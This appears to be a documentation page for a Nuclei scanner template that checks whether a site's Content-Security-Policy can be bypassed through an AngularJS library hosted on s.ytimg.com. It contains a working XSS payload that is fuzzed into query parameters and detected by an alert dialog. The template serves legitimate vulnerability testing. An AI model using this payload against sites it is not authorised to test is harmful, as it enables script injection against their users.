Skip to content

Content-Security-Policy Bypass - YTImg S

ID: ytimg-s-csp-bypass

Severity: medium

Author: renniepak,DhiyaneshDK

Tags: xss,csp-bypass,ytimg-s

id: ytimg-s-csp-bypass
info:
name: Content-Security-Policy Bypass - YTImg S
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,ytimg-s
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "ytimg.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: ytimg_s_csp_xss
args:
max-duration: 5s
payloads:
injection:
- <body ng-app ng-csp><script src="https://s.ytimg.com/yts/jslib/angular.min-vfl8oYsy-.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "ytimg_s_csp_xss == true"
# digest: 4b0a00483046022100e01daee740cee7abfaae4f81c964e66450618e82ba3e2932dcb5353c101c4783022100b536480cff4c03d714a8b1f9edf781443a5f50adc1e426b0b0c66c4719913c39:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "dast/vulnerabilities/xss/csp-bypass/ytimg-s-csp-bypass.yaml"

View on Github